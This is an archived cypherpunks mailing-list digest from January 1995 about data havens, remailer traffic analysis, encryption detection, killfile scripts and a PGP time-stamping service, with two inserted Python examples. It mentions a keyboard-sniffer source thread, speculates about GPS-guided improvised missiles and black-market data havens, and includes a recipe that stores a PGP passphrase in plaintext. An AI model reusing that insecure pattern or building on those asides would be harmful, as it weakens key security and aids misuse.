For whether it's encrypted to the nth degree, or parked in a plain brown wrapper in a massive unix box somewhere, as long as I the haven manager, return the data in a safe, timely, uncorrupted manner, I've done my duty.
Love Always, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From carolb at barton.spring.com Thu Jan 12 01:23:31 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Thu, 12 Jan 95 01:23:31 PST Subject: keyboard sniffer TSR source code... In-Reply-To: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU> Message-ID: I'm sure that as many people are now silently testing it, and that they are a bit busy at the moment, I think they'd register their thanks if they could. Love Always, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From rparratt at london.micrognosis.com Thu Jan 12 01:43:37 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 12 Jan 95 01:43:37 PST Subject: Storm Signals Message-ID: <9501120943.AA03267@pero> > > If I were the DOD, I would set the standard GPS default to selective > availability. After all, with SA on military receivers can still get > fine positioning data. If someone could come up with a good reason to > turn SA off, great, but I wouldn't leave it on otherwise. > > The scenarios concerning GPS-piloted Cessnas full of nasty stuff come > to mind, especially vis-a-vis the North Koreans. 
They probably don't > have accurate IRBMs but they certainly could cobble together a > Learjet-based delivery system. SA is effectively cancelled out by using differential GPS (Using a correction transmitter to send out differences between GPS as-reported position and actual position). However, any 'home made cruise missile' would need to be fairly slow moving and manoevring. One of the features of p-Code is support for 'high-dynamic' vehicles. I've been away from the navigation field for some years, so others may know more. Does the Russian Glonass system have SA? -- Richard Parratt From parsons at bga.com Thu Jan 12 03:52:29 1995 From: parsons at bga.com (Brad Parsons) Date: Thu, 12 Jan 95 03:52:29 PST Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) Message-ID: ---------- Forwarded message ---------- Date: Wed, 11 Jan 1995 07:32:03 -0800 (PST) From: Skip Leuschner Subject: Re: CBS/C.Chung Plan Hit Job on Internet? I see C.Chung's program as one of the first vollies in a new phase of a TV/print media project. Internet and talk radio emerged as political forces in the '94 election. If political influence by the media is a zero-sum game, as I believe it is, then the TV and print media must look to their own survival by trying to discredit or regulate their talk radio/internet competition. Regards, Skip. From caj at tower.stc.housing.washington.edu Thu Jan 12 04:02:58 1995 From: caj at tower.stc.housing.washington.edu (Craig A. Johnston) Date: Thu, 12 Jan 95 04:02:58 PST Subject: mail killfiling Message-ID: <199501121202.EAA03835@tower.stc.housing.washington.edu> There was some talk on the list earlier about reading the list through news so as to be able to use kill files. Here is an alternate way for folks that have 'deliver' installed on their system as the local mail agent. (do a "grep Mlocal /etc/sendmail.cf" to see...if you don't see 'deliver' in there somewhere, you don't. This is provided you are using sendmail, of course.) 
First, install the following as ".deliver" in your home dir:

--- cut here ---
#!/bin/sh
# delivers all mail except that from folks in $NOMAIL
NOMAIL=.nomail
FROM=`header -f From $HEADER`
# -F matches the From: text literally instead of as a regular expression;
# an empty From: would match every line of $NOMAIL, so skip the check then
if [ -n "$FROM" ] && grep -F -e "$FROM" "$NOMAIL" >/dev/null 2>/dev/null
then
        # we don't want any mail from this person!
        exit
fi
echo "$1"       # otherwise, deliver as usual
--- cut here ---

Now, you also need this little script that I call "killem" installed
in your home dir.

--- cut here ---
#!/bin/sh
# appends the From: field of the message on stdin to $NOMAIL
NOMAIL=.nomail
header -f From >> "$NOMAIL"
--- cut here ---

Now, let's say you are in your mailbox and you see such a horrible
piece of mail from someone that you never want to see any mail from
them again. ;)  Provided you are using 'elm', (probably is a mechanism
for this on other readers.) just pipe the message through 'killem'
with a "|" from elm and answer "killem" when asked what you want to
pipe the message through.  The From: line will be stripped and stuck
in .nomail (or whatever you change it to) and you won't see any more
mail from this person.

Of course, this is not entirely true: mail that does not get delivered
will go to a file called Undel.mail in your home dir, which you can
keep, or have a cron job deal with, or whatever you like.  Also, if
they change their 'real name' on their system, you'll start to get
mail from them again.  (i.e. w/'chfn' or the like.)

This is just a quick hack I whipped up a moment ago, and could of
course be improved/changed.  'deliver' will also run perl scripts, and
it should be relatively easy to write something that way that will
handle wildcarding and field selection.  An automated mailing to folks
upon their 'termination' could be added for those that want to rub it
in, or an automated bounce that sends mail right back with a note that
their mail is not being received.

If you want to block mail based just upon the account name and not
have to worry about them changing their "real" name, you can just add
the account name to .nomail manually.  Judicious use of the unix 'cut'
command could have 'killem' just toss the account name into .nomail
for mail coming from unixy systems, but would fail for others, so I
decided to not assume anything about the From: line.

Ought to work fine and transparently for most folks as-is.  Ingenious
folks can build on it.  I dunno how many systems use 'deliver', but
it's sort of a Linux (slackware) default, and those using it can avoid
learning procmail with this script.

Enjoy,
Craig.

From root at einstein.ssz.com Thu Jan 12 04:44:27 1995
From: root at einstein.ssz.com (root)
Date: Thu, 12 Jan 95 04:44:27 PST
Subject: Data Havens..A consumer perspective
In-Reply-To:
Message-ID: <199501121232.GAA01351@einstein.ssz.com>

> 2. In order for me to let you store it, I will give it to you
> anyway you wish to get it.

I will let you store it but in order to access it I get access to your
stores of data.

> 3. I will let you do anything to the data you wish, so long as I
> get it back intact.

Actually for a real data haven to work it should not only keep the
original data but any inferences you make with the old data or any new
data you use in the analysis of the old data.

> 5. I would expect to pay money for the safekeeping of my data.

Or provide some service in kind.

> 6. I would expect the longer you hold the data, the more it will cost.

The longer you hold the data the less it is worth.

From brendan at moe.oc3s-emh1.army.mil Thu Jan 12 05:22:32 1995
From: brendan at moe.oc3s-emh1.army.mil (Brendan McKenna)
Date: Thu, 12 Jan 95 05:22:32 PST
Subject: Cryptanalysis
Message-ID: <9501121322.AA22913@toad.com>

Hi,

In light of recent threads about recognising whether or not a given
message/file is encrypted, and using CBW and things along those lines, is there
any way to determine how something was encrypted?  For example, I know that
a statistical analysis of the cyphertext will uncover simple substitution
cyphers fairly quickly.  Does the same sort of analysis apply to determining
whether something was encrypted using IDEA or DES or RSA?  I realize that they
attempt to maximize the entropy of the cyphertext -- perhaps there is some
characteristic amount or range of amounts of entropy associated with these
cyphers?  Not every package is as nice as PGP in labeling everything it
encrypts with headers...  Any pointers would be greatly appreciated....

Brendan

PS.  What I'd like to be able to do is take a given chunk of cyphertext and
analyze it and say:  "There is an x% probability that this was encrypted
using method y...."  Hopefully I'd have a reasonable chance of recognizing
how it was encrypted, and not all of the percentages would be so low as
to make the exercise meaningless.

From roy at cybrspc.mn.org Thu Jan 12 05:57:08 1995
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 12 Jan 95 05:57:08 PST
Subject: Cybersmut
In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com>
Message-ID: <950112.065951.0M1.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jya at pipeline.com writes:

[ two horsemen deletia ]

> Brick said telltale signs of porn being downloaded include:
>
> "If you have a 100-megabyte drive and it's always full and
> the kids are demanding more memory. Photos can take a lot
> of memory. "

[ giggle, snort ]  A full 100 meg drive is a telltale sign of a typical
Windoze installation.

Sheesh!  These 'reporters' need a hobby...

- --
Roy M. Silvernail -- roy at cybrspc.mn.org
"I'm a family man, model citizen."
-- Warren Zevon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxUoORvikii9febJAQHQOQQAlG3rOFcDP54Wi6IAjBpfu+y3Bq7paB9V
gaTJ5wYG6EkvpkUIoHyimF2NXXpRVRcRJbtsE/bDNRfKV/csifTHlXILNl/IOE6r
RUPxTrHY7r0ubWouy4qdi5i4q4tQ88jOFYQUPu7jPJPfqzC7XX84l5vHMakytx0D
pI9CegILWtY=
=3NRh
-----END PGP SIGNATURE-----

From weidai at eskimo.com Thu Jan 12 06:02:40 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 12 Jan 95 06:02:40 PST
Subject: analysis of RemailerNet
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I've been reading through T.C. May's FAQ, and came upon this section
about analyzing the RemailerNet.

> + What's needed:
>   - agreement on some terminology (this doesn't require
>     consensus, just a clearly written paper to de facto
>     establish the terminology)
>   - a formula relating degree of untraceability to the major
>     factors that go into remailers: packet size and
>     quantization, latency (# of messages), remailer policies,
>     timing, etc.
>   - Also, analysis of how deliberate probes or attacks might
>     be mounted to deduce remailer patterns (e.g., Fred always
>     remails to Josh and Suzy and rarely to Zeke).
>   - I think this combinatorial analysis would be a nice little
>     monograph for someone to write.
> 8.10.2. A much-needed thing. Hal Finney has posted some calculations
>   (circa 1994-08-08), but more work is sorely needed.

I think one of the most difficult aspects of analyzing remailers is the
large number of variables you have to deal with.  In contrast, when
analyzing ciphers things are pretty much static.  The only thing
variable you have to worry about is key length.  But think of the
factors you have to include in a complete analysis of the RemailerNet:

1. different methods of attack
   - passive traffic analysis (i.e., packet sniffing)
   - active attacks: including physical attacks, subverting remailer
     security, flooding, denial-of-service, starting "trap" remailers,
     etc.
2. differences at the user level
   - fixed vs random chains vs something in between
   - length of chains
   - numbers of real messages sent
   - numbers of fake (cover) messages sent
   - concerns about latency, bandwidth, and monetary costs
   - acceptability of risk, and benefits of anonymity
3. differences at the individual remailer level
   - the mixing mechanism: does batched mailing occur by time or by the
     number of messages in the queue, and is there a rollover pool?
   - security: including vulnerabilities to political, physical, and
     electronic attacks
   - usage level
   - price
4. differences at the RemailerNet level
   - total numbers of remailers
   - average security (or the number of compromised remailers)
   - total number of users

... and I'm sure there are more.

The number of variables and the complex way they're all interrelated
make the analysis difficult.  Perhaps a good way to go about this is to
construct simplified models which focus on different aspects.  For
example, someone pointed out that if you didn't have to worry about
active attacks, and the attacker can monitor all the remailers, then
you can treat the entire RemailerNet as a single large remailer.

I'm not sure how well this approach would work, since I don't know how
easy it would be to integrate the different simplified models into a
realistic one.  Anyhow, this might at least give us some insights, so
I'll make some attempts in this direction, and post my results.

Just to start things off though, let me try an *extremely* simple
model.  Assume there is just one remailer, it's perfectly secure, and
it does 4 batches of remailing at equal intervals each day.  There are
one million users, each of whom receives a mail from the remailer once
per day.  Alice is sending anonymous mail to Bob through this system,
also once per day.  But just to be extra careful, she also sends a
cover mail to the remailer at some other time each day, which gets
redirected to its /dev/null.  So the situation looks like this on
day 1:

            Alice sends   Bob receives   some random user receives
Batch #1:        0             0                    0
Batch #2:        1             1                    0
Batch #3:        0             0                    1
Batch #4:        1             0                    0

Suppose Eve, the traffic analyst, is trying to figure out who Alice is
sending mail to.  After the first day, she can eliminate about half of
the remailer users from the list of possible targets, because they,
like the random user above, received a mail even though Alice didn't
send one out during the collection period of that batch.  Now, since
Eve can eliminate on average half of the list every day, Bob will be
the only person left on that list after about (log base 2 of one
million) = 20 days.

Suppose Alice sent out some different numbers of cover e-mail:

# of cover mail    # of days to discover Bob
       0           log base 4 of 1,000,000 = 10
       1           log base 2 of 1,000,000 = 20
       2           log base 4/3 of 1,000,000 = 48
       3           log base 1 of 1,000,000 = infinity!

Hopefully that makes sense...  Comments?

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxU0QTl0sXKgdnV5AQFkoAP/SSyqbbDw+zoh+q5aL0+xr5BcLzaEoS4h
NASocZvKHGLe8/sfefDj4J2zPINKhmQzbKdD4oHirPEVbnWZC+7Us3giCKl80t2V
bKx6QPB1hJWi6n3cFme6NCuTjmHCsgrQ/bI2j524O43FhW6BIQAAxQ6GGN10t1V8
3nv3SzUC6jE=
=Y2qv
-----END PGP SIGNATURE-----

From tedwards at src.umd.edu Thu Jan 12 06:20:29 1995
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Thu, 12 Jan 95 06:20:29 PST
Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd)
In-Reply-To:
Message-ID:

On Thu, 12 Jan 1995, Brad Parsons wrote:

> From: Skip Leuschner
> I see C.Chung's program as one of the first volleys in a new phase of a
> TV/print media project.
> Internet and talk radio emerged as political forces in the '94
> election. If political influence by the media is a zero-sum game, as I
> believe it is, then the TV and print media must look to their own
> survival by trying to discredit or regulate their talk radio/internet
> competition.

Clearly.  I think Time magazine, as they come onto the Internet, is
realizing that the culture here does not take well to bogus and
misleading journalism.  The Time reporter who wrote the article on the
modern militia movement in the US asked on talk.politics.guns what
people thought about his article - oh my, you've never seen such a
flamefest!  Not to mention the immense amount of pro-firearm opinions
on the Time WWW talkback area.  For a magazine which has publicly
announced that they are anti-RKBA, I think they are viewing all of this
with some dismay.

That is only a single issue - I think as more standard media groups
come on-line, they will have to choose either to try to destroy the net
through demonizing it, or change with it into an adaptive reporting
system with traditional journalistic ethics.

-Thomas

From weidai at eskimo.com Thu Jan 12 06:26:07 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 12 Jan 95 06:26:07 PST
Subject: time stamping service (again)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

My PGP based time stamping service is back online.  I took it down a
while ago thinking the folks at notary.com (Digital Time-Stamp, Inc.)
were going to release their commercial time stamping product soon (it
uses a more elegant protocol that doesn't require trust in the time
stamper, but the algorithm is patented).  But I haven't heard anything
from them in a while.

Anyway, it is now running as the following procmail recipe:

:0 w
* ^Subject: Time Stamp This Mail
{
  PGPPASS=whateveryourpassphraseis
  :0 c w
  | (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \
     +clearsig=off) > timestamp.out

  :0 a h
  | (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \
    ($SENDMAIL -t ;rm -f timestamp.lock)
}

To use it, just send whatever you need time stamped to me with
the subject "time stamp this mail".

BTW, can a procmail expert explain to me why the locallockfile
mechanism doesn't work with this recipe?  If I use :0 w : as
the first line, procmail will happily ignore the locallockfile
flag and proceed to munge up timestamp.out, so I have to do
the filelocking manually.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxU7Zjl0sXKgdnV5AQE1agP/TFGtHEUj6GUwEF1ISGLcUZ/T64Vs7BUJ
PIcydYUDk/5AVPLS2F8r81oLLxDUzYFkVy/6uvhnj6Pvo17ZIx6ELhKNPLPVoLPL
iklR9E7rmY2cRMQfuCPRYi10x4mD9yJcw0GmlQmgOqZS/HfQ30njrsAeDXBUNvA5
SvFBaPKuOro=
=NNoJ
-----END PGP SIGNATURE-----

From rparratt at london.micrognosis.com Thu Jan 12 06:26:18 1995
From: rparratt at london.micrognosis.com (Richard Parratt)
Date: Thu, 12 Jan 95 06:26:18 PST
Subject: Cryptanalysis
Message-ID: <9501121425.AA03332@pero>

> In light of recent threads about recognising whether or not a given
> message/file is encrypted, and using CBW and things along those lines, is there
> any way to determine how something was encrypted? For example, I know that
> a statistical analysis of the cyphertext will uncover simple substitution
> cyphers fairly quickly. Does the same sort of analysis apply to determining
> whether something was encrypted using IDEA or DES or RSA? I realize that they
> attempt to maximize the entropy of the cyphertext -- perhaps there is some
> characteristic amount or range of amounts of entropy associated with these
> cyphers? Not every package is as nice as PGP in labeling everything it
> encrypts with headers... Any pointers would be greatly appreciated....

If the encryption method is any good, the output will be pseudo-random
with no digit being more frequent than any other.  This certainly
applies to IDEA and DES.  With RSA, you usually have a random (IDEA)
session key encrypted using the sender's private key.  This will also
be an effectively 'random' number.

> PS. What I'd like to be able to do is take a given chunk of cyphertext and
> analyze it and say: "There is an x% probability that this was encrypted
> using method y...." Hopefully I'd have a reasonable chance of recognizing
> how it was encrypted, and not all of the percentages would be so low as
> to make the exercise meaningless.

This would only work for ciphers that are effectively 'broken'.  Also,
many packages and users compress data before encryption.  Compression
algorithms work by removing patterns from data, so the resultant
compressed plaintext becomes fairly random anyway, removing the utility
of frequency analysis.

--
Richard Parratt

From nelson at crynwr.com Thu Jan 12 06:26:46 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 06:26:46 PST
Subject: Reefer madness
In-Reply-To:
Message-ID:

   From: craig at passport.ca (Craig Hubley)
   Date: Thu, 12 Jan 1995 01:20:00 -0500 (EST)
   Cc: efc-talk at insight.dcss.mcmaster.ca

   Seems to me I have seen something like this cybersmut hype before...
   wasn't it called 'Reefer Madness'?

The threat is no doubt overblown, but it's not all foolishness.  My NY
State Senator is proposing to make a felony out of initiating contact
with a minor for sexual purposes.  It's illegal now, but it's only a
misdemeanor.

I spoke to Bob Penna, the legislative aide who researched and wrote up
the bill for Bill Sears.  He realizes that the Internet cannot
reasonably be censored, and that the solution is to be able to punish
people who do it (hence the felony) and to educate parents and teachers
to supervise children's online dealings (hence the travelling road show
to do just that).

No mention of "watch out if your child starts using encryption
programs" as a sign of online abuse.  Bob Penna admitted to having no
online access, so I'm sure he knows nothing about encryption.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?
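
[Added example, not part of the archived messages: the one-remailer model from Wei Dai's "analysis of RemailerNet" post earlier in this digest, as a Python simulation that checks the post's log formula against a day-by-day run. Function names, the seed and the reduced population are assumptions made for the illustration; the `batches` parameter generalizes the post's fixed 4 batches per day.]

```python
import math
import random

BATCHES_PER_DAY = 4   # the model's remailer flushes 4 batches a day


def expected_days(users, cover, batches=BATCHES_PER_DAY):
    """Days until only the real recipient is left, by the post's formula.

    Alice's real mail plus `cover` cover mails occupy 1 + cover distinct
    batches.  Any other user's daily mail lands in one of those batches with
    probability (1 + cover) / batches, so Eve's list shrinks by the factor
    batches / (1 + cover) each day.
    """
    keep = (1 + cover) / batches
    if keep >= 1:
        return math.inf            # Alice sends in every batch: no one is ruled out
    return math.log(users) / math.log(1 / keep)


def simulate(users, cover, seed, batches=BATCHES_PER_DAY, max_days=365):
    """Play Eve's elimination day by day.

    Returns (days, history): days is the day on which only Bob is left (None
    if that never happens within max_days), history the list size per day.
    """
    if not 0 <= cover < batches:
        raise ValueError("need 1 + cover <= batches")
    rng = random.Random(seed)      # seeded so that runs are repeatable
    bob = 0
    candidates = set(range(users)) # Eve's list of possible recipients
    history = []
    for day in range(1, max_days + 1):
        sent = rng.sample(range(batches), 1 + cover)
        real_batch, alice_batches = sent[0], set(sent)
        still_possible = set()
        for user in candidates:
            # Bob's mail leaves in the batch carrying Alice's real message;
            # everyone else receives in an unrelated, uniformly random batch.
            arrival = real_batch if user == bob else rng.randrange(batches)
            if arrival in alice_batches:
                still_possible.add(user)
        candidates = still_possible
        history.append(len(candidates))
        if len(candidates) == 1:
            return day, history
    return None, history


if __name__ == "__main__":
    for cover in range(BATCHES_PER_DAY):
        formula = expected_days(1_000_000, cover)
        days, _ = simulate(100_000, cover, seed=1995, max_days=80)
        print(f"cover={cover}  formula(1e6 users)={formula:6.1f}  "
              f"simulated(1e5 users)={days}")
```

The simulated count usually lands a little above the formula, because the run ends only when the last unlucky bystander is eliminated, not when the expected list size reaches one.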
From nelson at crynwr.com Thu Jan 12 06:44:09 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 12 Jan 95 06:44:09 PST Subject: good stuff Message-ID: Interestingly enough, there are lots of interesting documents, including anti-clipper screeds etc, on the New York State Education Department's gopher. Good stuff for political activists (as opposed to passivists :). gopher://unix5.nysed.gov:70/11/TelecommInfo/Reading%20Room%20-%20Points%20of%20View -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From jalicqui at prairienet.org Thu Jan 12 07:16:58 1995 From: jalicqui at prairienet.org (Jeff A Licquia) Date: Thu, 12 Jan 95 07:16:58 PST Subject: Knowing Something's Encrypted Message-ID: Maybe I'm missing something here. If I am, please bonk me. Here's a simple method for knowing that some data you received is encrypted: 1. Require a specific method (we'll use PGP in this example). 2. When a message comes in, check for a PGP format message. If you really wanted to get fancy, you could parse the PGP header a bit to make sure the data was really encrypted. It's true that this isn't "cryptographic" in the sense of testing the ciphertext itself, but it should work for the practical goal of enforcing a "must be encrypted" rule. ---------------------------------------------------------------------- Jeff Licquia (lame .sig, huh?) | Finger for PGP 2.6 public key jalicqui at prairienet.org | Me? Speak for whom? You've got licquia at cei.com (work) | to be kidding! 
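
[Added example, not part of the archived messages: one way to implement the check Jeff Licquia describes above, de-armoring a submission and reading its packet headers to confirm it is encrypted rather than merely armored. Function names, the accept/reject policy and the sample inputs are constructed for the illustration; besides the old-format headers that PGP 2.x writes it also reads the new-format headers of later OpenPGP, which goes beyond the post.]

```python
import base64

KEY_TAGS = {1, 3}      # public-key / symmetric-key encrypted session key
DATA_TAGS = {9, 18}    # symmetrically encrypted data (18: integrity protected)


def crc24(data):
    """Checksum carried on the '=XXXX' line that closes an armor block."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def dearmor(text):
    """Return the binary packets of the first PGP MESSAGE block, or None."""
    lines = [line.strip() for line in text.splitlines()]
    try:
        start = lines.index("-----BEGIN PGP MESSAGE-----")
        end = lines.index("-----END PGP MESSAGE-----", start)
        blank = lines.index("", start, end)      # ends the "Version:" headers
        body = lines[blank + 1:end]
        if not body or len(body[-1]) != 5 or body[-1][0] != "=":
            return None                          # policy: checksum line required
        data = base64.b64decode("".join(body[:-1]), validate=True)
        crc = base64.b64decode(body[-1][1:], validate=True)
    except ValueError:                           # marker missing or bad base64
        return None
    return data if crc24(data) == int.from_bytes(crc, "big") else None


def packet_tags(data):
    """Return the tag of each top-level packet; ValueError if malformed."""
    tags, pos = [], 0
    while pos < len(data):
        ctb, pos = data[pos], pos + 1
        if not ctb & 0x80:
            raise ValueError("bit 7 clear, not a packet header")
        if ctb & 0x40:                           # new format: tag in bits 5-0
            tag, head = ctb & 0x3F, data[pos:pos + 5]
            if head and head[0] < 192:
                length, used = head[0], 1
            elif len(head) >= 2 and head[0] < 224:
                length, used = ((head[0] - 192) << 8) + head[1] + 192, 2
            elif len(head) == 5 and head[0] == 255:
                length, used = int.from_bytes(head[1:], "big"), 5
            elif head and 224 <= head[0] < 255:  # partial lengths: body runs on
                length, used = None, 0
            else:
                raise ValueError("truncated length field")
        else:                                    # old format (PGP 2.x): bits 5-2
            tag, used = (ctb >> 2) & 0x0F, (1, 2, 4, 0)[ctb & 0x03]
            if len(data) - pos < used:
                raise ValueError("truncated length field")
            length = int.from_bytes(data[pos:pos + used], "big") if used else None
        tags.append(tag)
        if length is None:                       # indeterminate: rest of input
            break
        pos += used + length
        if pos > len(data):
            raise ValueError("packet runs past end of data")
    return tags


def check_submission(text):
    """Decide whether a submission is a PGP-encrypted message: (ok, reason)."""
    data = dearmor(text)
    if data is None:
        return False, "no valid PGP MESSAGE armor"
    try:
        tags = packet_tags(data)
    except ValueError as exc:
        return False, "malformed packets: %s" % exc
    if tags and tags[-1] in DATA_TAGS and all(t in KEY_TAGS for t in tags[:-1]):
        return True, "encrypted (packet tags %s)" % tags
    return False, "armored but not encrypted (packet tags %s)" % tags


def armor(data):
    """Wrap bytes in armor; used only to build the constructed samples below."""
    b64 = base64.b64encode(data).decode()
    crc = base64.b64encode(crc24(data).to_bytes(3, "big")).decode()
    rows = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join(["-----BEGIN PGP MESSAGE-----", "Version: 2.6.2", ""]
                     + rows + ["=" + crc, "-----END PGP MESSAGE-----"])


# Constructed samples: the header bytes are real packet headers, bodies are filler.
ENCRYPTED = armor(bytes([0x84, 3, 1, 2, 3, 0xA5, 0, 4]) + b"\xde\xad\xbe\xef")
SIGNED_ONLY = armor(b"\xa3" + b"compressed signature and literal data")
PLAINTEXT = "Dear Mom, the weather here is fine.\n"
```

The SIGNED_ONLY sample is the case the header check exists for: it carries valid armor and a valid checksum, but its first packet is a compressed-data packet (tag 8), so anyone can read the contents.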
From adam at bwh.harvard.edu Thu Jan 12 07:25:33 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Thu, 12 Jan 95 07:25:33 PST
Subject: time stamping service (again)
In-Reply-To:
Message-ID: <199501121525.KAA17530@bwh.harvard.edu>

| Anyway, it is now running as the following procmail recipe:
|
| :0 w
| * ^Subject: Time Stamp This Mail
| {
|   PGPPASS=whateveryourpassphraseis
|   :0 c w
|   | (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \
|      +clearsig=off) > timestamp.out
|
|   :0 a h
|   | (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \
|     ($SENDMAIL -t ;rm -f timestamp.lock)
| }
|
| To use it, just send whatever you need time stamped to me with
| the subject "time stamp this mail".
|
| BTW, can a procmail expert explain to me why the locallockfile
| mechanism doesn't work with this recipe? If I use :0 w : as
| the first line, procmail will happily ignore the locallockfile
| flag and proceed to munge up timestamp.out, so I have to do
| the filelocking manually.

You need a lockfile on the :0 cw line, not on the :0 w .

:0 cw:
| pgp -fast +batchmode +force +verbose=0 +clearsig=off > timestamp.out

From root at nesta.pr.mcs.net Thu Jan 12 07:26:24 1995
From: root at nesta.pr.mcs.net (Nesta Stubbs)
Date: Thu, 12 Jan 95 07:26:24 PST
Subject: How do I know if its encrypted?
In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com>
Message-ID:

On Wed, 11 Jan 1995, Dale Harrison wrote:

> >
> >A practical system would cut out a notch at 6/8 for ASCII armor, which
> >would make approximation techniques a bit tricky. More practical is
> >just to detect ASCII armor with a regular expression recognizer and
> >de-armor it before the entropy check.
> >
> >Eric
> >
> >
> Won't work! You can always embed an encrypted message in what 'looks'
> like plaintext. A trivial example: Encrypt a message with a caesar
> cypher, then build a story where the first char of each word maps to
> each subsequent char from the encrypted text. At the cost of expanding
> the size of the message by a factor of 5 to 10 you've hidden the
> encrypted message in what looks like a letter to your mother (or a news
> story in the NY Times, etc.) This is old technique.
>
> Dale H.

But Dale, that doesn't matter much.  the user is then going out of his
way to get rejected.  The data haven would be known to its users to
require encrypted text, and a user who did the scheme you outline above
would only be succeeding in getting himself rejected.  I mean it's not
the operator's fault he decided to be snazzy and put it in plaintext
when it was known to be required to be encrypted, as in knowingly
encrypted.

From root at nesta.pr.mcs.net Thu Jan 12 07:36:14 1995
From: root at nesta.pr.mcs.net (Nesta Stubbs)
Date: Thu, 12 Jan 95 07:36:14 PST
Subject: Data Havens..A consumer perspective
In-Reply-To:
Message-ID:

On Thu, 12 Jan 1995, Censored Girls Anonymous wrote:

>
> 1. You have what I want or need.
> 2. In order for me to let you store it, I will give it to you
> anyway you wish to get it.
> 3. I will let you do anything to the data you wish, so long as I
> get it back intact.

why would you give the haven owner free run?  I mean naturally he does
have free run with your data once he gets it, but a matter of trust,
and encryption protects you marginally.

> 4. It is no concern (only idle curiosity maybe) where the data is parked.

it matters a lot to me, that's the security of the data, what if your
data is sem top secret plan to bomb the pentagon, and you are using the
data haven to distribute to your band of anonymous terrorists, I am
sure you wouldn't want your data stored on a public access Unix system,
or in plaintext.

> 5. I would expect to pay money for the safekeeping of my data.

you can do this a number of ways if the datahaven is turned into a data
broker, i can pay you for good data others would be willing to buy
(Blacknet anyone?) or you could pay me for access to data, or for safe
secure storage and anon transfer of data to other users.

> 6. I would expect the longer you hold the data, the more it will cost.
> 7. The only thing I am counting on is the data's timely retrieval.
> 8. Welcome to the world of data "coatchecking".
>
> Why make it more complex than this?

because it is if you want security, and also to bring in money if that
is a motive.

> For whether it's encrypted to the nth degree, or parked in a plain brown
> wrapper in a massive unix box somewhere, as long as I the haven manager,
> return the data in a safe, timely, uncorrupted manner, I've done my duty.
>

well what would be the purpose of this data haven you propose except as
an extra storage space for data, like if you don't have space on your
own drive?  You're leaving out anon drop boxes, data brokering, or the
data haven serving as a center for black markets.

From daleh at ix.netcom.com Thu Jan 12 07:38:43 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Thu, 12 Jan 95 07:38:43 PST
Subject: Cryptanalysis
Message-ID: <199501121537.HAA01536@ix2.ix.netcom.com>

You wrote:

>If the encryption method is any good, the output will be pseudo-random
>with no digit being more frequent than any other. This certainly applies
>to IDEA and DES. With RSA, you usually have a random (IDEA) session key
>encrypted using the senders private key. This will also be an effectively
>'random' number.

Just a technical note, but a normal distribution of digits (i.e. 'no
digit more frequent than any other') is no indication of either
randomness or 'good' encryption.  A better test is to look for a normal
distribution at all scale levels.  For example, the following text
block: "UUU" (in ASCII) has a normal distribution at the bit level
"0101 0101 0101 0101 0101 0101", but not at the byte level.

Dale H.
